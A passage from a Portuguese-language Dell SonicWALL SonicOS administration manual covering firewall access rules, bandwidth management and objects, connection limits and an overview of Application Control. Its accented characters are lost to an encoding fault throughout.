Dell SonicWALL. Por exemplo, uma regra de acesso que bloqueie o trfego IRC tem prioridade
sobre a configurao padro do dispositivo de segurana Dell SonicWALL que permite este
tipo de trfego.
Cuidado A capacidade de definio de regras de acesso rede uma ferramenta muito eficiente. O
uso de regras de acesso personalizadas pode desabilitar a proteo de firewall ou bloquear
todo o acesso Internet. Tenha cuidado ao criar ou excluir regras de acesso rede.

Viso geral do uso do gerenciamento de largura de banda com as
regras de acesso
O gerenciamento de largura de banda (BWM) permite atribuir largura de banda mxima e
garantida a servios e definir a prioridade do trfego. Usando regras de acesso, o BWM pode
ser aplicado a trfego de rede especfico. Os pacotes que pertencem a uma poltica habilitada
por gerenciamento de largura de banda sero enfileirados na fila de prioridade correspondente
antes de serem enviados.
Voc deve configurar o gerenciamento de largura de banda individualmente para cada
interface na pgina Rede > Interfaces. Clique no cone Configurar da interface e selecione a
guia Avanado. Insira suas larguras de banda do trfego de sada e entrada disponveis nos
campos Largura de banda do trfego de sada da interface disponvel (Kbps) e Largura
de banda do trfego de entrada da interface disponvel (Kbps), respectivamente. Isso
aplica-se quando o tipo de gerenciamento de largura de banda na pgina Servios de firewall
> BWM est definido para Avanado ou Global.
Exemplo de cenrio de Largura de banda global

Se voc criar uma regra de acesso para trfego de e-mails enviados (como SMTP) e habilitar
o gerenciamento de largura de banda com os seguintes parmetros:
Largura de banda garantida de 20 por cento
Largura de banda mxima de 40 por cento
Prioridade de 0 (zero)
O trfego SMTP de sada garantido em 20% da largura de banda disponvel e pode chegar
at 40% da largura de banda disponvel. Se o trfego SMTP for a nica regra de BWM
habilitada:
Quando o trfego SMTP estiver usando o respectivo mximo de largura de banda
configurado (mximo de 40%, tal como descrito acima), todo o outro trfego fica com os
restantes 60% da largura de banda.
Quando o trfego SMTP estiver usando menos do que o respectivo mximo de largura de
banda configurado, todo o outro trfego fica com 60% a 100% da largura de banda de link.
Agora, considere adicionar a seguinte regra habilitada pelo BWM para FTP:
Largura de banda garantida de 60%
Largura de banda mxima de 70%
Prioridade de 1
Quando configurado juntamente com a regra SMTP anterior, o trfego age da seguinte forma:
60% da largura de banda total esto sempre reservados ao trfego FTP (devido ao que
est garantido). 20% da largura de banda total esto sempre reservados ao trfego SMTP
(devido ao que est garantido).
Se SMTP estiver usando 40% da largura de banda total e FTP estiver usando 60% da
largura de banda total, ento no possvel enviar qualquer outro trfego, uma vez que a
largura de banda est sendo usada a 100% pelo trfego de alta prioridade. Se SMTP e FTP
estiverem usando menos do que os respectivos valores mximos, ento possvel que
outro trfego use a percentagem restante de largura de banda disponvel.
Se o trfego SMTP for reduzido e somente usar 10% da largura de banda total, ento FTP
pode usar at 70% e todo o outro trfego fica com os 20% restantes.
Se o trfego SMTP parar, FTP fica com 70% e todo o outro trfego fica com os restantes
30% da largura de banda.
Se o trfego FTP tiver parado, SMTP fica com 40% e todo o outro trfego fica com os
restantes 60% da largura de banda.

Configurando regras de acesso para o IPv6
As Regras de acesso podem ser configuradas para o IPv6 de forma semelhante s VPNs do
IPv4, depois de selecionar a opo IPv6 no boto de opo Exibir verso do IP localizado na
parte superior esquerda da pgina Firewall > Regras de acesso.
Lista de tarefas de configurao

Esta seo fornece uma lista das seguintes tarefas de configurao:
Exibir regras de acesso com estilos de visualizao na pgina 558
Configurar regras de acesso de uma zona na pgina 559
Adicionar regras de acesso na pgina 560
Editar uma regra de acesso na pgina 563
Excluir uma regra de acesso na pgina 563
Habilitar e desabilitar uma regra de acesso na pgina 563
Restaurar regras de acesso s configuraes de zona padro na pgina 564
Exibir estatsticas de trfego de regra de acesso na pgina 564
Viso geral do limite de conexo na pgina 564
Exemplos de configurao de regras de acesso na pgina 565
Exibir regras de acesso com estilos de visualizao

As regras de acesso podem ser exibidas em vrias visualizaes usando o SonicOS
Enhanced. Voc pode selecionar o tipo de visualizao nas selees da seo Estilo de
visualizao. Esto disponveis os seguintes Estilos de visualizao:
Todas as regras - Selecione Todas as regras para exibir todas as regras de acesso
configuradas no dispositivo de segurana Dell SonicWALL.
Matriz exibida como De/para com LAN, WAN, VPN ou outra interface na linha De e
LAN, WAN, VPN ou outra interface na coluna Para. Selecione o cone Editar na clula
da tabela para visualizar as regras de acesso.
Caixas suspensas exibe dois menus suspensos: Da zona e Para a zona. Selecione
uma interface no menu Da zona e selecione uma interface no menu Para a zona. Clique
em OK e as regras de acesso definidas para as duas interfaces sero exibidas.
Dica Voc tambm pode visualizar as regras de acesso por zonas. Use as caixas de seleo de
opo nas colunas Da zona e Para a zona. Selecione LAN, WAN, VPN, TUDO na coluna
Da zona. Em seguida, selecione LAN, WAN, VPN, TUDO na coluna Para a zona. Clique
em OK para exibir as regras de acesso.
Cada visualizao exibe uma tabela de regras de acesso rede definidas. Por exemplo, se
selecionar Todas as regras, sero exibidas todas as regras de acesso rede de todas as
zonas.

Configurar regras de acesso de uma zona
Para exibir as Regras de acesso de uma zona especfica, selecione uma zona na visualizao
Matriz, Caixas suspensas ou Todas as regras.
As regras de acesso so classificadas da mais especfica no topo menos especfica na parte

inferior da tabela. Na parte inferior da tabela encontra-se a regra Qualquer. A regra de acesso
padro inclui todos os servios IP, exceto aqueles listados na pgina Regras de acesso. As
regras de acesso podem ser criadas para substituir o comportamento da regra Qualquer, por
exemplo, a regra Qualquer permite que os usurios na LAN acessem todos os servios de
Internet, incluindo notcias NNTP.
Voc pode alterar a classificao de prioridade de uma regra de acesso ao clicar no cone de
setas na coluna Prioridade. A janela Alterar prioridade exibida. Digite o nmero da nova
prioridade (110) no campo Prioridade e clique em OK.
Dica Se os cones Excluir ou Editar estiverem esmaecidos (indisponveis), a regra de acesso

no pode ser alterada ou excluda da lista.

Adicionar regras de acesso
Para adicionar regras de acesso ao dispositivo de segurana Dell SonicWALL, execute as
seguintes etapas:
Etapa 1 Clique em Adicionar na parte inferior da tabela Regras de acesso. A janela Adicionar regra
exibida.
Etapa 2 Na guia Geral, selecione Permitir | Negar | Descartar na lista Ao para permitir ou bloquear
o trfego IP.
Etapa 3 Selecione de/para zonas nos menus De zona e Para Zona.
Etapa 4 Selecione o servio ou o grupo de servios afetados pela regra de acesso na lista Servio. O
servio Padro engloba todos os servios IP.
Se o servio no estiver listado, voc deve definir o servio na janela Adicionar servio.
Selecione Criar novo servio ou Criar novo grupo para exibir a janela Adicionar servio ou
Adicionar grupo de servios.
Etapa 5 Selecione a origem do trfego afetado pela regra de acesso na lista Origem. Selecionar Criar
nova rede exibe a janela Adicionar objeto de endereo.
Etapa 6 Se voc quiser definir os endereos IP de origem que so afetados pela regra de acesso, como
restringir o acesso de certos usurios Internet, digite os endereos IP iniciais da faixa de
endereos no campo Incio da faixa de endereos e o endereo IP final no campo Fim da
faixa de endereos. Para incluir todos os endereos IP, digite * no campo Incio da faixa de
endereos.
Etapa 7 Selecione o destino do trfego afetado pela regra de acesso na lista Origem. Selecionar Criar
nova rede exibir a janela Adicionar objeto de endereo.

Etapa 8 No menu Usurios permitidos, adicione o usurio ou o grupo de usurios afetados pela regra
de acesso.
Etapa 9 Selecione um cronograma no menu Cronograma. O cronograma padro est Sempre ativo.
Etapa 10 Insira os comentrios para ajudar a identificar a regra de acesso no campo Comentrios.
Etapa 11 Por padro, a caixa de seleo Permitir pacotes fragmentados est habilitada. Os pacotes
de IP grandes so frequentemente divididos em fragmentos antes de serem roteados atravs
da Internet e depois reagrupados no host de destino. Um motivo para desabilitar esta
configurao est relacionado com o fato de ser possvel explorar a fragmentao de IP em
ataques de negao de servio (DoS).
Etapa 13 Se desejar que a regra de acesso termine aps um perodo de inatividade do TCP, defina o
tempo, em minutos, no campo Tempo limite de inatividade da conexo TCP (minutos). O
valor padro de 5 minutos.
Etapa 14 Se desejar que a regra de acesso termine aps um perodo de inatividade do UDP, defina o
tempo, em minutos, no campo Tempo limite de inatividade da conexo UDP (minutos). O
valor padro de 30 minutos.
Etapa 15 Especifique o nmero de conexes permitidas como uma porcentagem do nmero mximo de
conexes permitidas pelo dispositivo de segurana Dell SonicWALL no campo Nmero de
conexes permitidas (% de conexes mximas). Consulte Viso geral do limite de conexo

na pgina 564 para obter mais informaes sobre o limite de conexo.
Etapa 16 Selecione Criar uma regra reflexiva se desejar criar uma regra de acesso correspondente a
esta na direo oposta: da zona de destino ou do objeto de endereo para a zona de origem
ou o objeto de endereo.
Etapa 17 Clique na guia QoS se desejar aplicar o gerenciamento da Qualidade de Servio DSCP ou
802.1p ao trfego regido por esta regra.
Etapa 18 Em Configuraes de marcao DSCP, selecione Ao de marcao DSCP. Voc poder

selecionar Nenhum, Preservar, Explcito ou Mapear. A opo Preservar o padro.
Nenhum: os valores DSCP em pacotes so redefinidos para 0.
Preservar: os valores DSCP em pacotes permanecero inalterados.
Explcito: defina o valor DSCP para o valor que selecionar no campo Valor DSCP
explcito. Este um valor numrico entre 0 e 63. Alguns dos valores padro so:
0 Melhor esforo/Padro (padro)
8 Classe 1
10 Classe 1, Ouro (AF11)
12 Classe 1, Prata (AF12)
14 Classe 1, Bronze (AF13)
16 Classe 2
24 Classe 3
32 Classe 4
40 Encaminhamento expresso

46 Encaminhamento rpido (EF)
48 Controle
56 Controle
Mapear: as configuraes de mapeamento QoS na pgina Firewall > Mapeamento
QoS sero usadas. Se voc selecionar Mapear, poder selecionar Permitir que a
marcao 802.1p substitua os valores DSCP.
Etapa 19 Em Configuraes da marcao 802.1p, selecione Ao da marcao 802.1p. Voc poder
selecionar Nenhum, Preservar, Explcito ou Mapear. Nenhum o padro.
Nenhum: no adicionada marcao 802.1p aos pacotes.
Preservar: os valores 802.1p em pacotes permanecero inalterados.
Explcito: defina o valor 802.1p para o valor que selecionar no campo Valor 802.1p
explcito. Este um valor numrico entre 0 e 7. Os valores padro so:
0 Melhor esforo (padro)
1 Segundo plano
2 Reposio
3 Esforo excelente
4 Carga controlada
5 Vdeo (latncia < 100 ms)
6 Voz (latncia < 10 ms)
7 Controle de rede
Mapear: as configuraes de mapeamento QoS na pgina Firewall > Mapeamento
QoS sero usadas.
Etapa 20 Clique em OK para adicionar a regra.
Dica Embora possam ser criadas regras de acesso personalizadas que permitam o trfego IP de
ingresso, o dispositivo de segurana Dell SonicWALL no desabilita a proteo contra
ataques de DoS, como os ataques de inundao SYN e ping da morte.
Editar uma regra de acesso

Para exibir a janela Editar regra (inclui as mesmas configuraes que a janela Adicionar
regra), clique no cone Editar.
Excluir uma regra de acesso

Para excluir uma regra de acesso individual, clique no cone Excluir. Para excluir todas as
regras de acesso selecionadas, clique no boto Excluir.
Habilitar e desabilitar uma regra de acesso

Para habilitar ou desabilitar uma regra de acesso, clique na caixa de seleo Habilitar.

Restaurar regras de acesso s configuraes de zona padro
Para remover todas as regras de acesso configuradas de usurios finais de uma zona, clique
no boto Padro. Isto ir restaurar as regras de acesso da zona selecionada s regras de
acesso padro inicialmente configuradas no dispositivo de segurana de rede Dell SonicWALL.
Exibir estatsticas de trfego de regra de acesso

Mova o ponteiro do mouse sobre o cone Grfico para exibir as seguintes estatsticas de
trfego de recepo (Rx) e transmisso (Tx) de regras de acesso:
Bytes de recepo
Pacotes de recepo
Bytes de transmisso
Pacotes de transmisso
Viso geral do limite de conexo

O recurso de limite de conexo destina-se a oferecer uma camada adicional de segurana e
controle quando combinado com recursos do SonicOS, como cookies SYN e Intrusion
Prevention Services (IPS). O limite de conexo fornece um meio de estrangulamento de
conexes atravs do firewall usando regras de acesso como um classificador e declarando a
porcentagem mxima de cache de conexo disponvel total que pode ser alocada a essa
classe de trfego.
Junto com o IPS, isso pode ser usado para reduzir a disseminao de uma determinada classe
de malware, como exemplificado por Sasser, Blaster e Nimda. Esses worms se propagam
iniciando conexes a endereos aleatrios a altas taxas atpicas. Por exemplo, cada host
infectado pelo Nimda tenta 300 a 400 conexes por segundo, o Blaster envia 850 pacotes por
segundo e o Sasser consegue realizar 5120 tentativas por segundo. O trfego de rede tpico
e no malicioso geralmente no se compara a nenhum desses nmeros, especialmente
quando nos deparamos com trfego confivel -> no confivel (por exemplo, LAN->WAN).
Atividades maliciosas deste tipo podem consumir todos os recursos de cache disponveis em
segundos, principalmente em dispositivos menores.
A tabela seguinte descreve o tamanho do cache de conexo dos dispositivos de segurana de
rede Dell SonicWALL executando o SonicOS com servios de segurana UTM habilitados ou
desabilitados (os nmeros esto sujeitos a alterao):
Cache de conexo mximo
Dispositivo de segurana de UTM

rede Dell SonicWALL completo Nenhum UTM
Alm da atenuao da propagao de worms e vrus, o limite de conexo pode ser usado para
melhorar outros tipos de problemas de consumo de recursos do cache de conexo, como
aqueles causados por hosts internos inflexveis que executam software ponto a ponto
(assumindo que o IPS est configurado para permitir esses servios) ou hosts internos ou
externos que usam geradores de pacotes ou ferramentas de verificao.
Finalmente, o limite de conexo pode ser usado para proteger servidores publicamente
disponveis (como servidores da Web) limitando o nmero de conexes legtimas de entrada
permitidas para o servidor (ou seja, para proteger o servidor contra o efeito slashdot). Isso

diferente da proteo contra inundao SYN que tenta detectar e prevenir conexes TCP
parcialmente abertas ou falsificadas. Isto ser mais adequado para o trfego no confivel,
mas pode ser aplicado a qualquer trfego de zona, conforme necessrio.
O limite de conexo aplicado ao definir uma porcentagem de conexes totais mximas
permitidas que podero ser alocadas a um determinado tipo de trfego. Os valores acima
mostram a configurao LAN -> WAN padro, em que todos os recursos disponveis podem
ser alocados ao trfego LAN->WAN (qualquer origem, qualquer destino, qualquer servio).
possvel construir regras mais especficas, por exemplo, para limitar a porcentagem de
conexes que podem ser consumidas por um determinado tipo de trfego (por exemplo,
trfego FTP para qualquer destino na WAN) ou dar prioridade ao trfego importante (por
exemplo, trfego HTTPS para um servidor crtico), atribuindo uma permisso de 100% a essa
classe de trfego e limitando o trfego geral para uma porcentagem menor (o valor mnimo
permitido de 1%).
Nota No possvel usar assinaturas de IPS como um classificador de limite de conexo.

Somente as regras de acesso (por exemplo, objetos de endereos e objetos de servios)
so permitidas.
Exemplos de configurao de regras de acesso

Esta seo fornece exemplos de configurao na adio de regras de acesso a redes:
Habilitar o ping na pgina 565
Bloquear o acesso LAN em servios especficos na pgina 565
Permitir acesso ao IP primrio de WAN a partir da zona de LAN na pgina 566
Habilitar o ping
Esta seo fornece um exemplo de configurao de uma regra de acesso para permitir que
dispositivos na DMZ enviem solicitaes de ping e recebam respostas de ping a partir de
dispositivos na LAN. Por padro, o seu dispositivo de segurana de rede Dell SonicWALL no
permite trfego iniciado na DMZ para alcanar a LAN. Depois de colocar uma das suas
interfaces na zona DMZ, na janela Firewall > Regras de acesso realize as seguintes etapas
para configurar uma regra de acesso que permita que dispositivos na DMZ enviem solicitaes
de ping e recebam respostas de ping a partir de dispositivos na LAN.
Etapa 1 Clique em Adicionar para abrir a janela Adicionar regra.

Etapa 2 Selecione o boto de opo Permitir.
Etapa 3 No menu Servio, selecione Ping.
Etapa 4 No menu Origem, selecione Sub-redes DMZ.
Etapa 5 No menu Destino, selecione Sub-redes LAN.
Bloquear o acesso LAN em servios especficos
Esta seo fornece um exemplo de configurao de uma regra de acesso para bloquear o
acesso LAN em servidores NNTP na Internet durante o horrio de expediente.
Realize as seguintes etapas para configurar uma regra de acesso que bloqueia o acesso LAN
em servidores NNTP com base em uma programao:

Etapa 1 Clique em Adicionar para abrir a janela Adicionar.
Etapa 2 Selecione Negar nas configuraes de Ao.
Etapa 3 Selecione NNTP no menu Servio. Se o servio no estiver listado na lista, voc precisa
adicion-lo na janela Adicionar servio.
Etapa 4 Selecione Qualquer no menu Origem.
Etapa 5 Selecione WAN no menu Destino.
Etapa 6 Selecione o cronograma no menu Cronograma.
Etapa 7 Introduza quaisquer comentrios no campo Comentrio.
Permitir acesso ao IP primrio de WAN a partir da zona de LAN
Ao criar uma regra de acesso, possvel permitir o acesso a um endereo IP de gerenciamento

em uma zona a partir de outra zona no mesmo firewall. Por exemplo, voc pode permitir o
gerenciamento HTTP/HTTPS ou ping ao endereo IP da WAN no lado da LAN. Para tal, voc
deve criar uma regra de acesso para permitir o servio relevante entre as zonas, fornecendo
um ou mais endereos IP de gerenciamento explcitos como destino. Como alternativa, voc
pode fornecer um grupo de endereos que inclua um ou vrios endereos de gerenciamento
(tais como IP primrio de WAN, Todos os IPs de WAN, Todos os IPs de gerenciamento X1)
como o destino. Este tipo de regra permite o gerenciamento HTTP, gerenciamento HTTPS,
gerenciamento SSH, ping e servios SNMP entre zonas.
Nota As regras de acesso s podem ser definidas para gerenciamento entre zonas. O
gerenciamento entre zonas controlado por interface atravs de configuraes na
configurao da interface.
Para criar uma regra que permite o acesso ao IP primrio de WAN a partir da zona da LAN:
Etapa 1 Na pgina Firewall > Regras de acesso, exiba as regras de acesso LAN > WAN.
Etapa 2 Clique em Adicionar para abrir a janela Adicionar.
Etapa 3 Selecione Permitir nas configuraes de Ao.
Etapa 4 Selecione um dos seguintes servios no menu Servio:

HTTP

HTTPS
Gerenciamento SSH
Ping
SNMP
Etapa 5 Selecione Qualquer no menu Origem.
Etapa 6 Selecione um grupo de endereos ou objeto de endereos que contenha um ou mais
endereos IP de WAN explcitos no menu Destino.

Nota No selecione um grupo de endereos ou objeto que represente uma sub-rede,
como a Sub-rede primria de WAN. Isto permitir acesso a dispositivos na sub-rede
de WAN (j permitido por padro), mas no aos endereos IP de gerenciamento de
WAN.
Etapa 7 Selecione o usurio ou o grupo para atribuir acesso no menu Usurios permitidos.
Etapa 8 Selecione o cronograma no menu Cronograma.
Etapa 9 Introduza quaisquer comentrios no campo Comentrio.
Habilitar gerenciamento de largura de banda em uma regra de acesso
O gerenciamento de largura de banda pode ser aplicado no trfego de ingresso e egresso

usando regras de acesso. As regras de acesso com o cone Funil so configuradas para o
gerenciamento de largura de banda.
Dica No configure o gerenciamento de largura de banda em vrias interfaces em uma zona em

que a largura de banda garantida configurada da zona superior largura de banda
disponvel da interface associada.


Captulo 41
Configurando objetos de largura de
banda
Firewall > Objetos de largura de banda
Gerenciamento avanado da largura de banda

A configurao do gerenciamento de largura de banda baseada em polticas que especificam
as limitaes de largura de banda para classes de trfego. Uma poltica completa de largura
de banda inclui duas partes: um classificador e uma regra de largura de banda.
Um classificador especifica os parmetros, como a prioridade, a largura de banda garantida e
a largura de banda mxima, e configurado em um objeto de largura de banda. Os
classificadores identificam e organizam pacotes em classes de trfego de acordo com critrios
especficos.
Para obter informaes sobre como usar Objetos de largura de banda em Regras de acesso,
Regras de aplicativos e Objetos de ao, consulte Configuraes de firewall > BWM na
pgina 677.
Configurando objetos de largura de banda | 569

Configurando objetos de largura de banda
Para adicionar ou configurar um objeto de largura de banda:
Etapa 1 No Dispositivo de segurana da Dell SonicWALL, acesse Firewall > Objetos de largura de
banda.
Etapa 2 Clique no boto Adicionar para criar um novo Objeto de largura de banda.
ou
Clique no boto Configurar do Objeto de largura de banda que deseja alterar.
Etapa 3 Clique na guia Geral.

Etapa 4 Na caixa Nome, digite um nome para este objeto de largura de banda.
Etapa 5 Na caixa Largura de banda garantida, digite a quantidade de largura de banda que este
objeto de largura de banda garantir fornecer a uma classe de trfego (em kbps ou Mbps).
Etapa 6 Na caixa Largura de banda mxima, digite a quantidade mxima de largura de banda que
este objeto de largura de banda fornecer a uma classe de trfego.
Etapa 7 A largura de banda realmente alocada pode ser inferior a este valor quando vrias classes de

trfego competem por uma largura de banda compartilhada.
Etapa 8 Na caixa Prioridade de trfego, digite a prioridade que este objeto de largura de banda
fornecer a uma classe de trfego. A prioridade mais alta 0. A prioridade mais baixa 7.
Etapa 9 Quando vrias classes de trfego competem por largura de banda compartilhada, fornecida
precedncia s classes com prioridade mais elevada.
Etapa 10 Na caixa Ao de violao, digite a ao que este objeto de largura de banda fornecer
(atraso ou descarte) quando o trfego excede a configurao da largura de banda mxima.
Atraso especifica que os pacotes de trfego em excesso sero enfileirados e enviados
quando for possvel.
Descarte especifica que os pacotes de trfego em excesso sero descartados
imediatamente.
Etapa 11 Na caixa Comentrio, digite um comentrio ou uma descrio para este objeto de largura de
banda.
Etapa 12 Selecione a guia Elementar.
Etapa 13 No cabealho Configuraes de Largura de banda elementar, selecione a opo Habilitar

o gerenciamento da largura de banda de acordo com o IP se desej-lo e digite o valor de
Largura de banda mxima.
Configurando objetos de largura de banda | 571

Captulo 42
Configurar o Controle de aplicativos
Controle de aplicativos
Esta seo descreve como configurar e gerenciar o recurso Controle de aplicativos no
SonicOS. Esta seo contm as seguintes subsees:
Viso geral do Controle de aplicativos na pgina 573
Licenciar o Controle de aplicativos na pgina 606
Firewall > Regras de acesso na pgina 619
Firewall > Controle de aplicativos avanado na pgina 609
Firewall > Objetos de correspondncia na pgina 627
Firewall > Objetos de ao na pgina 631
Firewall > Objetos de endereos na pgina 632
Firewall > Objetos de servios na pgina 632
Firewall > Objetos de endereo de e-mail na pgina 633
Verificar configurao do controle de aplicativos na pgina 634
Casos de uso do controle de aplicativos na pgina 641
Viso geral do Controle de aplicativos

Esta seo fornece uma apresentao do recurso Controle de aplicativos do SonicOS. Esta
seo contm as subsees seguintes:
O que o Controle de aplicativos? na pgina 574
Benefcios do Controle de aplicativos na pgina 575
Como funciona o Controle de aplicativos? na pgina 577
Configurar o Controle de aplicativos | 573

O que o Controle de aplicativos?
O Controle de aplicativos fornece uma soluo para definir regras de polticas para assinaturas
de aplicativos. As polticas de Controle de aplicativos incluem polticas globais de Controle de
aplicativos e polticas de regras de aplicativos que so mais direcionadas. O SonicOS permite
que voc crie determinados tipos de polticas de controle de aplicativos de forma dinmica,
diretamente na pgina Painel > Monitor de AppFlow.
Como um conjunto de polticas especficas de aplicativos, o Controle de aplicativos fornece
controle granular sobre o trfego de rede ao nvel dos usurios, endereos de e-mail,
programaes e sub-redes de IP. A funcionalidade principal deste recurso de camada de
aplicativo regular a navegao na Web, a transferncia de arquivos, as mensagens de e-mail
e os anexos de e-mail.
A capacidade de controlar o trfego na camada de aplicativos do SonicOS significativamente
melhorada com a capacidade de visualizar os fluxos de trfego de aplicativos em tempo real e
novas formas de acessar o banco de dados de assinatura do aplicativo e criar regras de
camada de aplicativo. O SonicOS integra controle de aplicativos com recursos de controle de
rede padro para um controle mais poderoso sobre todo o trfego de rede.
Sobre polticas de controle de aplicativos
O SonicOS oferece trs maneiras de criar polticas de controle de aplicativos e controlar

aplicativos em sua rede:
Criar regra a partir do monitor de AppFlow a pgina Painel > Monitor de AppFlow
fornece um boto Criar regra que permite que o administrador configure rapidamente
polticas de controle de aplicativos para bloqueio de aplicativos, gerenciamento de largura
de banda ou monitoramento de pacotes. Isso permite que o administrador aplique
rapidamente uma ao em um aplicativo que ele detecta ao usar os recursos Visualization
and Application Intelligence do firewall. A poltica criada automaticamente e exibida na
tabela Polticas de regras de aplicativos na pgina Firewall > Regras de aplicativos.
Controle de aplicativos avanado a pgina Firewall > Controle de aplicativos avanado
oferece uma maneira simples e direta de configurar polticas globais de controle de
aplicativos. Voc pode habilitar rapidamente o bloqueio ou o registro de uma categoria
completa de aplicativos e pode facilmente localizar e realizar o mesmo para um aplicativo
individual ou assinatura individual. Quando habilitado, a categoria, o aplicativo ou a
assinatura bloqueado(a) ou conectado(a) globalmente, sem a necessidade de criar uma
poltica na pgina Firewall > Regras de aplicativos. A configurao de deteco e
preveno de aplicativos est disponvel na pgina Firewall > Controle de aplicativos
avanado.
Regras de aplicativos a pgina Firewall > Regras de aplicativos fornece a terceira forma
de criar uma poltica de controle de aplicativos. Este mtodo equivalente ao mtodo
usado no recurso original de regras de aplicativos. As polticas criadas usando regras de
aplicativos so mais especficas, pois combinam um objeto de correspondncia, um objeto
de ao e, possivelmente, um objeto de endereo de e-mail em uma poltica. Para
flexibilidade, as polticas de regras de aplicativos podem acessar os mesmos controles de
aplicativos de qualquer categoria, aplicativo ou assinatura disponvel na pgina Controle
de aplicativos avanado. A pgina Firewall > Objetos de correspondncia fornece uma
forma de criar objetos de lista de aplicativos, objetos de lista de categorias de aplicativo e
objetos de lista de assinatura de aplicativo para usar como objetos de correspondncia em
uma poltica de regras de aplicativos. Na pgina Objetos de correspondncia tambm
possvel configurar as expresses regulares para a correspondncia de contedo no
trfego de rede. As pginas Firewall > Objetos de ao permitem criar aes
personalizadas para usar na poltica.

Sobre as capacidades do Controle de aplicativos
O componente de preveno de vazamento de dados do Controle de aplicativos oferece a

capacidade de verificar o contedo e as palavras-chave de arquivos e documentos. Usando o
Controle de aplicativos, voc pode restringir a transferncia de determinados nomes de
arquivos, tipos de arquivos, anexos de e-mails, tipos de anexos, e-mails com determinados
assuntos e e-mails ou anexos com determinadas palavras-chave ou padres de bytes. Voc
pode negar o acesso interno ou externo rede com base em vrios critrios. Voc pode usar
o monitor de pacotes para uma anlise mais detalhada do trfego do aplicativo e poder
selecionar entre vrias configuraes de gerenciamento de largura de banda para reduzir o
uso de largura de banda da rede por um aplicativo.
Baseado na tecnologia Reassembly Free Deep Packet Inspection da Dell SonicWALL, o
Controle de aplicativos tambm oferece a funcionalidade de preveno inteligente que permite
criar aes personalizadas, com base em polticas. Exemplos de aes personalizadas
incluem o seguinte:
Bloquear aplicativos na totalidade, com base nas suas assinaturas
Bloquear recursos ou subcomponentes do aplicativo
Limitar a largura de banda de tipos de arquivos quando utilizar os protocolos HTTP ou FTP
Bloquear um anexo
Enviar uma pgina de bloqueio personalizada
Enviar uma resposta de e-mail personalizada
Redirecionar uma solicitao HTTP
Enviar uma resposta FTP personalizada por meio de canal de controle de FTP
O Controle de aplicativos fornece principalmente controle de acesso ao nvel do aplicativo,
gerenciamento de largura de banda de camada de aplicativo e preveno contra vazamento
de dados, mas tambm inclui a capacidade de criar aplicativos personalizados ou assinaturas
de correspondncia de protocolo. Voc pode criar uma poltica de regras de aplicativos
personalizada que corresponda a qualquer protocolo que desejar, correspondendo a um nico
componente do protocolo. Consulte Assinatura personalizada na pgina 660.
O Controle de aplicativos fornece uma excelente funcionalidade para evitar a transferncia
acidental de documentos de propriedade. Por exemplo, quando usado o recurso de
preenchimento automtico de endereos do Outlook Exchange, normal que um nome
popular seja inserido com o endereo incorreto. Consulte a figura seguinte para obter um
exemplo.
Benefcios do Controle de aplicativos

A funcionalidade de Controle de aplicativos fornece os seguintes benefcios:

A configurao baseada em aplicativo facilita a configurao de polticas para controle de
aplicativos.
O servio de assinatura de Controle de aplicativos fornece assinaturas atualizadas
medida que surgem novos ataques.
A funcionalidade Application Intelligence relacionada, tal como verificado no monitor de
AppFlow e no monitor de visualizao em tempo real, est disponvel mediante registro
como uma licena de avaliao gratuita de 30 dias de visualizao de aplicativos. Isso
permite que qualquer dispositivo Dell SonicWALL registrado exiba claramente informaes
sobre o trfego de aplicativos na rede. As licenas de visualizao de aplicativos e controle
de aplicativos tambm esto includas no conjunto de licenas de servios de segurana
da Dell SonicWALL. Observe que o recurso deve ser habilitado na interface de
gerenciamento SonicOS para ficar ativo.
Os administradores podem usar o boto Criar regra para aplicar rapidamente o
gerenciamento de largura de banda ou o monitoramento de pacotes em um aplicativo
detectado ao visualizar a pgina Monitor de AppFlow ou podem bloquear completamente
o aplicativo.
Os administradores podem definir configuraes de polticas para assinaturas individuais
sem influenciar outras assinaturas do mesmo aplicativo.
As telas de configurao do Controle de aplicativos esto disponveis no menu Firewall, na
interface de gerenciamento do SonicOS, consolidando na mesma rea todas as regras e
polticas de acesso do Controle de aplicativos e do firewall.
A funcionalidade de Controle de aplicativos pode ser comparada s trs categorias principais
de produtos:
Dispositivos de proxy autnomos
Proxies de aplicativos integrados em dispositivos VPN do firewall
Dispositivos IPS autnomos com suporte de assinatura personalizada
Os dispositivos de proxy autnomos normalmente so projetados para fornecer um controle de
acesso granular para um determinado protocolo. O Controle de aplicativos da Dell SonicWALL
fornece controle de acesso granular ao nvel do aplicativo em vrios protocolos, incluindo
HTTP, FTP, SMTP e POP3. Uma vez que o Controle de aplicativos executado em seu firewall,
voc poder us-lo para controlar o trfego de entrada e de sada, ao contrrio de um
dispositivo dedicado de proxy que normalmente implantado em apenas uma direo. O
Controle de aplicativos fornece melhor desempenho e escalabilidade em relao a um
dispositivo dedicado de proxy, pois ele se baseia na tecnologia patenteada Deep Packet
Inspection (Inspeo profunda de pacotes) da SonicWALL.
Os proxies de aplicativos integrados dos dias de hoje no fornecem controle de acesso
granular ao nvel do aplicativo, gerenciamento de largura de banda na camada do aplicativo e
a funcionalidade de gerenciamento de direitos digitais. Tal como acontece com os dispositivos
de proxy dedicados, o Controle de aplicativos da SonicWALL fornece um desempenho superior
e muito maior de escalabilidade do que solues integradas de proxy de aplicativos.
Enquanto alguns dispositivos IPS autnomos oferecem suporte de decodificao de
protocolos, nenhum desses produtos suporta controle de acesso granular ao nvel do
aplicativo, gerenciamento de largura de banda na camada do aplicativo e funcionalidade de
gerenciamento de direitos digitais.
Comparando o Controle de aplicativos com o SonicWALL Email Security, existem benefcios
na utilizao dos dois. O Email Security funciona com apenas SMTP, mas ele possui um amplo
espao de polticas. O Controle de aplicativos funciona com SMTP, POP3, HTTP, FTP e outros
protocolos, est integrado no SonicOS no firewall e possui um desempenho superior
relativamente ao Email Security. No entanto, o Controle de aplicativos no suporta todas as
opes de polticas para SMTP que so fornecidas pelo Email Security.

Como funciona o Controle de aplicativos?
O Controle de aplicativos utiliza o SonicOS Deep Packet Inspection para examinar o trfego
de rede de camada de aplicativo medida que passa pelo gateway e localizar contedo que
corresponde a aplicativos configurados. Quando uma correspondncia encontrada, esses
recursos executam a ao configurada. Quando voc configura polticas de controle de
aplicativos, so criadas regras globais que definem se se deve bloquear ou registrar o
aplicativo, quais os usurios, grupos ou intervalos de endereos IP que devem ser includos
ou excludos e uma programao para imposio. Alm disso, voc pode criar polticas de
regras de aplicativos que definem o seguinte:
Tipo de aplicativos a verificar
Direo, contedo, palavras-chave ou padro a corresponder
Usurio ou domnio a corresponder
Ao a executar
As sees a seguir descrevem os componentes principais de Controle de aplicativos:
